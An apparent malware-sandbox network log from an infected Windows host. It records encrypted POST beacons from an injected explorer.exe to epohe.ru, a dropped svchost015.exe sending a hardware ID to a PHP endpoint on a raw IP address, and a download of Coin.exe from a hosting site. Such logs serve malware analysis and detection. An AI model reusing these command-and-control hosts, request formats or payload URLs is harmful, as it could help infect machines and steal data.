                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  23192.168.2.6497422.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:09.651580095 CEST270OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://xqysrgfmfacgd.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 127
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:09.651602983 CEST127OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 71 08 d0 bc
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuqTq`A{m-D}$Qh
                                                  Sep 2, 2024 08:21:11.300154924 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:11 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  24192.168.2.6497432.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:11.308118105 CEST270OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://bjsidbjqhyjuh.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 335
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:11.308139086 CEST335OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5e 42 e9 9d
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu^Bh#}yo@/50nN;^hu[MlG1^[G7S4~Q.G^=E6SB#E%wk)wxg"8
                                                  Sep 2, 2024 08:21:11.605308056 CEST605OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://bjsidbjqhyjuh.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 335
                                                  Host: epohe.ru
                                                  Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5e 42 e9 9d 68 23 9c ab e4 7d 14 85 cc db ee f5 79 6f 88 9e b7 cd b2 1a b3 e2 ea 40 d4 17 2f 35 30 11 6e 91 11 b0 4e 3b 8c 8c ec bb ea ad 5e 68 f4 b5 cb 75 c6 5b ba 16 a8 00 d3 4d 6c 47 98 31 5e dd 5b 1a 47 37 9c 53 98 f4 b3 be cb c6 9c ec b2 34 eb c5 c4 7e 51 e3 07 2e c0 b4 47 a4 5e 3d 45 f0 93 a3 af d7 ba f5 da 9b c0 13 1c e1 ae 95 36 d5 fe 9d 53 ab 03 d2 f5 e0 ba 96 c7 c6 80 42 23 91 93 e0 45 25 ce ce c6 1b 17 94 c1 05 ff 77 6b 29 a0 77 a5 d6 99 1e bb db 05 78 67 96 22 1c e6 c5 38 f2 11 0c b6 dd be 89 85 0b bc b2 b2 77 f5 2b c6 10 0d 81 e9 bf 1f d4 2a 32 d8 1d 27 13 9d 4d 73 e8 c3 a0 3f cf 52 e1 48 9b ea 7a 9e 18 2b 73 44 27 e5 ea 01 46 d5 b8 74 9a c8 75 61 2a ac d7 ad 19 36 4c 1a 4a c2 f7 cb 0b f1 bd e1 a6 ca 00 15 6f 8e 4d 93 df ce 26 eb 71 81 27 58 9b f8
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu^Bh#}yo@/50nN;^hu[MlG1^[G7S4~Q.G^=E6SB#E%wk)wxg"8w+*2'Ms?RHz+sD'Ftua*6LJoM&q'X
                                                  Sep 2, 2024 08:21:12.689039946 CEST219INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:12 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 3c 0b e9 f3 51 fa 91 ee af 36 d9 2f d9 e8 22 59 14 c1 d3 dd 9d 3c 83 66 5b 1b 90 11 9e 50 68 54 51 af 88 7c e1 7e ed 42 0e 1b 39 06 13 9c 3d a7 23 06 bc
                                                  Data Ascii: #\6}Q<Q6/"Y<f[PhTQ|~B9=#


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  25192.168.2.6497452.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:16.183809042 CEST270OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://rbkqrcgmoxbnb.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 280
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:16.183840036 CEST280OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1d 6b 2c 90 f4 76 0b 75 75 59 d1 94
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA ,[k,vuuYRi&<lTz`e%N?E=Q;CLeh8Dyt.;XEYhn?)VoD)nmq-ww7 <6
                                                  Sep 2, 2024 08:21:17.770119905 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:17 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  26192.168.2.6497462.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:17.778636932 CEST270OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://ytcopihlywgad.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 299
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:17.778650999 CEST299OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 32 00 ed 95
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu2`^GHf?3Ag.}DB&3ZPQ({v*+!\W7;E;b*P%=B&myQM#RuC>I:+
                                                  Sep 2, 2024 08:21:18.914629936 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:18 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  27192.168.2.6497472.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:18.942918062 CEST268OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://ylpbksvjwmy.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 326
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:18.942945004 CEST326OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 35 5d fa 85
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu5](G{K^*mX\2Xg)zlBJ@-39[KLXc>2(hW\pVhy4nGb@Y5&W}mv-Pz
                                                  Sep 2, 2024 08:21:20.102070093 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:19 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  28192.168.2.6497482.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:20.109977961 CEST268OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://lumgcfdgtsy.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 303
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:20.109996080 CEST303OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 39 4f b8 ee
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu9O]~jIpg1^gqB2yY,VBLIBiP[3`F#s_$oF.?~p}u?=ececa5^
                                                  Sep 2, 2024 08:21:22.026204109 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:21 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  29192.168.2.6497502.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:22.319582939 CEST270OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://nlfvvperahgbd.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 143
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:22.319618940 CEST143OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 22 09 ae 87
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu"e3_|XUiabwulr<tS*@37S|
                                                  Sep 2, 2024 08:21:23.479399920 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:23 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  30192.168.2.64975191.202.233.158806812C:\Users\user\AppData\Local\Temp\svchost015.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:22.465679884 CEST89OUTGET / HTTP/1.1
                                                  Host: 91.202.233.158
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Sep 2, 2024 08:21:23.130409002 CEST203INHTTP/1.1 200 OK
                                                  Date: Mon, 02 Sep 2024 06:21:23 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Sep 2, 2024 08:21:23.134284973 CEST415OUTPOST /e96ea2db21fa9a1b.php HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAK
                                                  Host: 91.202.233.158
                                                  Content-Length: 214
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 34 34 36 44 41 46 41 45 33 34 31 35 39 34 39 33 34 32 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 2d 2d 0d 0a
                                                  Data Ascii: ------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="hwid"7E446DAFAE341594934204------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="build"default------CFIEGDAEHIEHIDHJDAAK--
                                                  Sep 2, 2024 08:21:23.383081913 CEST210INHTTP/1.1 200 OK
                                                  Date: Mon, 02 Sep 2024 06:21:23 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 8
                                                  Keep-Alive: timeout=5, max=99
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                                  Data Ascii: YmxvY2s=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.64974484.32.84.1524434004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-02 06:21:13 UTC192OUTGET /Coin.exe HTTP/1.1
                                                  Connection: Keep-Alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: www.darkviolet-alpaca-923878.hostingersite.com
